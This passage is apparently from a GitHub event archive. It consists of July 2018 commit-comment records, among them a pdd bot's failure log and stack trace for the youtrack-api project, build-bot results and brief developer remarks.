lines in /tmp/0pdd20180709-4-ayruvy/llorllale/youtrack-api/.pdd\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading .\nExcluding target/**/*\nExcluding src/site/resources/**/*\nExcluding checkstyle.xml\nExcluding release/**/*\nExcluding src/test/resources/docker/**/*\n178 file(s) found, 1237 excluded\nReading .travis.yml...\nReading CONTRIBUTING.md...\nReading .gitignore...\nReading src/test/resources/integration-tests-config.properties...\nReading src/test/java/org/llorllale/youtrack/api/BadRequestTest.java...\nReading src/test/java/org/llorllale/youtrack/api/PageTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlCommentIT.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultFieldsIT.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultAttachmentsIT.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlCommentTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultIssueTimeTrackingTest.java...\nPuzzle 206-33686010 0/DEV at src/test/java/org/llorllale/youtrack/api/DefaultIssueTimeTrackingTest.java\nReading src/test/java/org/llorllale/youtrack/api/DefaultCommentsTest.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockProject.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockUser.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/package-info.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockTimeTrackEntryType.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockAssignedField.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockLogin.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockUsersOfProject.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockIssue.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockProjectField.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockFields.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockField.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/MockFieldValue.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/package-info.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/MockBadRequestResponse.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/MockNotFoundResponse.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/MockInternalErrorResponse.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/MockUnauthorizedResponse.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/MockForbiddenResponse.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/response/MockOkResponse.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/package-info.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/MockThrowingHttpClient.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/MockHttpClient.java...\nReading src/test/java/org/llorllale/youtrack/api/mock/http/MockSession.java...\nReading src/test/java/org/llorllale/youtrack/api/package-info.java...\nReading src/test/java/org/llorllale/youtrack/api/InternalServerErrorResponseTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultAttachmentsTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlTimeTrackEntryTypeTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlAttachmentIT.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultFieldsTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlIssueIT.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlProjectFieldTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultCommentsIT.java...\nReading src/test/java/org/llorllale/youtrack/api/session/DefaultSessionTest.java...\nReading src/test/java/org/llorllale/youtrack/api/session/PermanentTokenTest.java...\nReading src/test/java/org/llorllale/youtrack/api/session/package-info.java...\nReading src/test/java/org/llorllale/youtrack/api/session/UsernamePasswordIT.java...\nReading src/test/java/org/llorllale/youtrack/api/session/DefaultCookieTest.java...\nReading src/test/java/org/llorllale/youtrack/api/session/AnonymousTest.java...\nReading src/test/java/org/llorllale/youtrack/api/session/UsernamePasswordTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultProjectsIT.java...\nReading src/test/java/org/llorllale/youtrack/api/ForbiddenResponseTest.java...\nReading src/test/java/org/llorllale/youtrack/api/BasicFieldValueTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlProjectTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlOfTest.java...\nReading src/test/java/org/llorllale/youtrack/api/SubstringAfterLastTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultIssuesIT.java...\nReading src/test/java/org/llorllale/youtrack/api/IntegrationTestsConfig.java...\nReading src/test/java/org/llorllale/youtrack/api/UnauthorizedResponseTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlUserTest.java...\nReading src/test/java/org/llorllale/youtrack/api/BasicFieldTest.java...\nReading src/test/java/org/llorllale/youtrack/api/UncheckedUriBuilderTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultUpdateIssueIT.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlUsersOfProjectTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultProjectTimeTrackingIT.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultIssueTimeTrackingIT.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlUsersOfIssueTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultIssuesTest.java...\nReading src/test/java/org/llorllale/youtrack/api/CachedLoginTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlTimeTrackEntryTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlAssignedFieldTest.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultProjectTimeTrackingTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlIssueTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlAttachmentTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlUsersOfIssueIT.java...\nReading src/test/java/org/llorllale/youtrack/api/DefaultProjectsTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlUsersOfProjectIT.java...\nReading src/test/java/org/llorllale/youtrack/api/UncheckedIoFunctionTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlFieldValueTest.java...\nReading src/test/java/org/llorllale/youtrack/api/XmlsOfTest.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlOf.java...\nReading src/main/java/org/llorllale/youtrack/api/UncheckedUriBuilder.java...\nReading src/main/java/org/llorllale/youtrack/api/YouTrack.java...\nReading src/main/java/org/llorllale/youtrack/api/YouTrackZoneId.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlIssue.java...\nReading src/main/java/org/llorllale/youtrack/api/HttpClientEnvelope.java...\nReading src/main/java/org/llorllale/youtrack/api/AssignedField.java...\nReading src/main/java/org/llorllale/youtrack/api/IdentityResponse.java...\nReading src/main/java/org/llorllale/youtrack/api/StringAsDocument.java...\nReading src/main/java/org/llorllale/youtrack/api/BasicFieldValue.java...\nReading src/main/java/org/llorllale/youtrack/api/Projects.java...\nReading src/main/java/org/llorllale/youtrack/api/HttpRequestWithEntity.java...\nReading src/main/java/org/llorllale/youtrack/api/ForbiddenResponse.java...\nReading src/main/java/org/llorllale/youtrack/api/PageUri.java...\nReading src/main/java/org/llorllale/youtrack/api/MappedCollection.java...\nReading src/main/java/org/llorllale/youtrack/api/StreamEnvelope.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlProjectField.java...\nReading src/main/java/org/llorllale/youtrack/api/package-info.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlUsersOfProject.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultComments.java...\nReading src/main/java/org/llorllale/youtrack/api/StreamOf.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlsOf.java...\nReading src/main/java/org/llorllale/youtrack/api/IssueTimeTracking.java...\nReading src/main/java/org/llorllale/youtrack/api/Issue.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlTimeTrackEntry.java...\nReading src/main/java/org/llorllale/youtrack/api/ProjectTimeTracking.java...\nReading src/main/java/org/llorllale/youtrack/api/Comment.java...\nReading src/main/java/org/llorllale/youtrack/api/User.java...\nReading src/main/java/org/llorllale/youtrack/api/session/DefaultCookie.java...\nReading src/main/java/org/llorllale/youtrack/api/session/PermanentToken.java...\nReading src/main/java/org/llorllale/youtrack/api/session/package-info.java...\nReading src/main/java/org/llorllale/youtrack/api/session/DefaultSession.java...\nReading src/main/java/org/llorllale/youtrack/api/session/Cookie.java...\nReading src/main/java/org/llorllale/youtrack/api/session/Session.java...\nReading src/main/java/org/llorllale/youtrack/api/session/UnauthorizedException.java...\nReading src/main/java/org/llorllale/youtrack/api/session/UsernamePassword.java...\nReading src/main/java/org/llorllale/youtrack/api/session/AuthenticationException.java...\nReading src/main/java/org/llorllale/youtrack/api/session/Login.java...\nReading src/main/java/org/llorllale/youtrack/api/session/Anonymous.java...\nReading src/main/java/org/llorllale/youtrack/api/SubstringAfterLast.java...\nReading src/main/java/org/llorllale/youtrack/api/UsersOfIssue.java...\nReading src/main/java/org/llorllale/youtrack/api/UnauthorizedResponse.java...\nReading src/main/java/org/llorllale/youtrack/api/ProjectField.java...\nReading src/main/java/org/llorllale/youtrack/api/HttpResponseAsResponse.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultClient.java...\nPuzzle 216-3cbd571f 0/DEV at src/main/java/org/llorllale/youtrack/api/DefaultClient.java\nReading src/main/java/org/llorllale/youtrack/api/Project.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultIssues.java...\nReading src/main/java/org/llorllale/youtrack/api/FieldValue.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultAttachments.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultIssueTimeTracking.java...\nReading src/main/java/org/llorllale/youtrack/api/HttpRequestWithSession.java...\nReading src/main/java/org/llorllale/youtrack/api/InputStreamAsString.java...\nReading src/main/java/org/llorllale/youtrack/api/Attachments.java...\nReading src/main/java/org/llorllale/youtrack/api/UncheckedIoFunction.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultFields.java...\nReading src/main/java/org/llorllale/youtrack/api/Issues.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultProjectTimeTracking.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java...\nPuzzle 223-3937f209 0/DEV at src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java\nReading src/main/java/org/llorllale/youtrack/api/XmlTimeTrackEntryType.java...\nReading src/main/java/org/llorllale/youtrack/api/Page.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlUsersOfIssue.java...\nReading src/main/java/org/llorllale/youtrack/api/TimeTrackEntryType.java...\nReading src/main/java/org/llorllale/youtrack/api/Attachment.java...\nReading src/main/java/org/llorllale/youtrack/api/TimeTrackEntry.java...\nReading src/main/java/org/llorllale/youtrack/api/Response.java...\nReading src/main/java/org/llorllale/youtrack/api/Field.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlFieldValue.java...\nReading src/main/java/org/llorllale/youtrack/api/Xml.java...\nReading src/main/java/org/llorllale/youtrack/api/InternalServerErrorResponse.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlUser.java...\nReading src/main/java/org/llorllale/youtrack/api/UpdateIssue.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultUpdateIssue.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlComment.java...\nReading src/main/java/org/llorllale/youtrack/api/DefaultProjects.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlAttachment.java...\nReading src/main/java/org/llorllale/youtrack/api/Counter.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlProject.java...\nReading src/main/java/org/llorllale/youtrack/api/UncheckedException.java...\nReading src/main/java/org/llorllale/youtrack/api/CachedLogin.java...\nReading src/main/java/org/llorllale/youtrack/api/BasicField.java...\nReading src/main/java/org/llorllale/youtrack/api/Pagination.java...\nReading src/main/java/org/llorllale/youtrack/api/ExceptionalFunction.java...\nReading src/main/java/org/llorllale/youtrack/api/UsersOfProject.java...\nReading src/main/java/org/llorllale/youtrack/api/Fields.java...\nReading src/main/java/org/llorllale/youtrack/api/BadRequest.java...\nReading src/main/java/org/llorllale/youtrack/api/XmlAssignedField.java...\nReading src/main/java/org/llorllale/youtrack/api/Comments.java...\nReading src/site/markdown/usage.md...\nReading src/site/markdown/index.md.vm...\nReading src/site/site.xml...\nReading .pdd...\nReading LICENSE...\nReading pom.xml...\nReading license_header_format.xml...\nReading README.md...\nReading NOTICE...\nReading NOTICE.template...\nERROR: Puzzle src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java:46-46 has a very short description of just 7 words while a minimum of 20 is required\nERROR: 1 errors, see log above. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-10T03:43:22Z"}
{"id":"7941307072","type":"CommitCommentEvent","actor":{"login":"Wilker"},"repo":{"name":"marcelacsr/store"},"payload":{"comment":{"id":29650627,"position":null,"line":null,"path":null,"commit_id":"3e7be905c5a4a5599073b53c18afb71731f653c1","created_at":"2018-07-10T03:45:21Z","updated_at":"2018-07-10T03:45:21Z","author_association":"NONE","body":"(y)"}},"created_at":"2018-07-10T03:45:21Z"}
{"id":"7941308916","type":"CommitCommentEvent","actor":{"login":"shimarin"},"repo":{"name":"esp8266/Arduino"},"payload":{"comment":{"id":29650629,"position":202,"line":202,"path":"cores/esp8266/core_esp8266_waveform.c","commit_id":"ebda795f34e6d09f5676782f0917ad298d9a9cdd","created_at":"2018-07-10T03:46:06Z","updated_at":"2018-07-10T03:46:06Z","author_association":"NONE","body":"PR sent. https://github.com/esp8266/Arduino/pull/4913\r\nI'd rather leave digitalRead/Write untouched at this point."}},"created_at":"2018-07-10T03:46:06Z"}
{"id":"7941311082","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29650632,"position":null,"line":null,"path":null,"commit_id":"e8c5334bd4ed48a01697f0490920526773aa9530","created_at":"2018-07-10T03:47:00Z","updated_at":"2018-07-10T03:47:00Z","author_association":"NONE","body":"Puzzle `216-2d921078` disappeared from [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java), that's why I closed #223. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T03:47:00Z"}
{"id":"7941311191","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29650633,"position":null,"line":null,"path":null,"commit_id":"e8c5334bd4ed48a01697f0490920526773aa9530","created_at":"2018-07-10T03:47:03Z","updated_at":"2018-07-10T03:47:03Z","author_association":"NONE","body":"Puzzle `223-5ca94c9b` discovered in   [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](  https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java)   and submitted as #228. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T03:47:03Z"}
{"id":"7941312329","type":"CommitCommentEvent","actor":{"login":"zhshaohui"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29650635,"position":6,"line":21,"path":"README.md","commit_id":"27818e18accf4b8c90f5e8119a0b925d22178248","created_at":"2018-07-10T03:47:30Z","updated_at":"2018-07-10T03:47:30Z","author_association":"NONE","body":"不知替换了那个IP？\r\n之前发现host中，微软VS2017的更新地址有问题，更新超慢。删除host后恢复正常下载速度。\r\n我也是通过laod.cn知道这个地址的。"}},"created_at":"2018-07-10T03:47:30Z"}
{"id":"7941313603","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"seredat/karbowanec"},"payload":{"comment":{"id":29650636,"position":null,"line":null,"path":null,"commit_id":"dd9e41505829737d3d111b2deca14cad3663d8e4","created_at":"2018-07-10T03:48:03Z","updated_at":"2018-07-10T03:48:03Z","author_association":"NONE","body":"err i think it's cuz it is bro. so this unused :v: "}},"created_at":"2018-07-10T03:48:03Z"}
{"id":"7941316053","type":"CommitCommentEvent","actor":{"login":"marcelacsr"},"repo":{"name":"marcelacsr/store"},"payload":{"comment":{"id":29650639,"position":null,"line":null,"path":null,"commit_id":"3e7be905c5a4a5599073b53c18afb71731f653c1","created_at":"2018-07-10T03:49:02Z","updated_at":"2018-07-10T03:49:02Z","author_association":"OWNER","body":"Amanhã me ajuda com essa DISGRACA\n\nOn Tue, Jul 10, 2018, 12:45 AM Wilker <notifications@github.com> wrote:\n\n> (y)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/marcelacsr/store/commit/3e7be905c5a4a5599073b53c18afb71731f653c1#commitcomment-29650627>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AddP-nQNCi2EDWz1X_zYW-xXmM83V8jKks5uFCNRgaJpZM4VItzZ>\n> .\n>\n"}},"created_at":"2018-07-10T03:49:02Z"}
{"id":"7941319802","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"adown69/aur-packages"},"payload":{"comment":{"id":29650651,"position":null,"line":null,"path":null,"commit_id":"23675ca9e8dea8c19b1279c0222203ec4751767b","created_at":"2018-07-10T03:50:31Z","updated_at":"2018-07-10T03:50:31Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"deploy\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-10T03:50:31.785Z\n\n</details>"}},"created_at":"2018-07-10T03:50:31Z"}
{"id":"7941319823","type":"CommitCommentEvent","actor":{"login":"LYW234"},"repo":{"name":"picotech/picosdk-ni-labview-examples"},"payload":{"comment":{"id":29650652,"position":null,"line":null,"path":null,"commit_id":"3210418c23be88f677d0995dac3cd049cf2b7781","created_at":"2018-07-10T03:50:32Z","updated_at":"2018-07-10T03:50:32Z","author_association":"NONE","body":"下载"}},"created_at":"2018-07-10T03:50:32Z"}
{"id":"7941323311","type":"CommitCommentEvent","actor":{"login":"starxchina"},"repo":{"name":"AimuZsGitHub/AimuZsGitHub.github.io"},"payload":{"comment":{"id":29650653,"position":29650643,"line":null,"path":"link/index.html","commit_id":"fcd40f1b131e92400713e3c742af9e0f526993a8","created_at":"2018-07-10T03:51:56Z","updated_at":"2018-07-10T03:51:56Z","author_association":"NONE","body":"`![]()"}},"created_at":"2018-07-10T03:51:56Z"}
{"id":"7941323638","type":"CommitCommentEvent","actor":{"login":"manio"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29650654,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-10T03:52:03Z","updated_at":"2018-07-10T03:52:03Z","author_association":"NONE","body":"Thank you Steve!\r\nPlease don't forget about us :)\r\n\r\nRegarding the hanging problem: I've also encounter similar problem (not yet sure if it is the same issue), so I had to investigate and test it further; anyway the problem is that collectd seems sometimes to hang in collecting data after rebooting one of the monitored mikrotik."}},"created_at":"2018-07-10T03:52:03Z"}
{"id":"7941323688","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"ParsiCoin/parsicoin"},"payload":{"comment":{"id":29650655,"position":null,"line":null,"path":null,"commit_id":"a08fb5a72d3debc04f6b53420ec8572f4638d1ab","created_at":"2018-07-10T03:52:04Z","updated_at":"2018-07-10T03:52:04Z","author_association":"NONE","body":"ah you fixed the problem nice. that i said no double spent key for that :v: "}},"created_at":"2018-07-10T03:52:04Z"}
{"id":"7941324598","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"ParsiCoin/parsicoin"},"payload":{"comment":{"id":29650658,"position":5,"line":1117,"path":"src/SimpleWallet/SimpleWallet.cpp","commit_id":"a08fb5a72d3debc04f6b53420ec8572f4638d1ab","created_at":"2018-07-10T03:52:25Z","updated_at":"2018-07-10T03:52:25Z","author_association":"NONE","body":"this one for fixed that exchange prob"}},"created_at":"2018-07-10T03:52:25Z"}
{"id":"7941327741","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650662,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-10T03:53:44Z","updated_at":"2018-07-10T03:53:44Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 280\n * Failed: 348\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-45.15%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-54.05%25-red.png)</a>\n"}},"created_at":"2018-07-10T03:53:44Z"}
{"id":"7941331121","type":"CommitCommentEvent","actor":{"login":"kimbermenjivar"},"repo":{"name":"kimbermenjivar/Project-Tic-Tac-Toe"},"payload":{"comment":{"id":29650672,"position":null,"line":null,"path":null,"commit_id":"66d82e285f4092b83630ae6e6c815be0d4cb1e6f","created_at":"2018-07-10T03:55:11Z","updated_at":"2018-07-10T03:55:11Z","author_association":"OWNER","body":"done for now"}},"created_at":"2018-07-10T03:55:11Z"}
{"id":"7941331539","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650674,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-10T03:55:22Z","updated_at":"2018-07-10T03:55:22Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T03:55:22Z"}
{"id":"7941332976","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29650676,"position":null,"line":null,"path":null,"commit_id":"d8f70a5f4083273445b5f5fa9287bb341681f6f9","created_at":"2018-07-10T03:55:56Z","updated_at":"2018-07-10T03:55:56Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-10T03:55:56Z"}
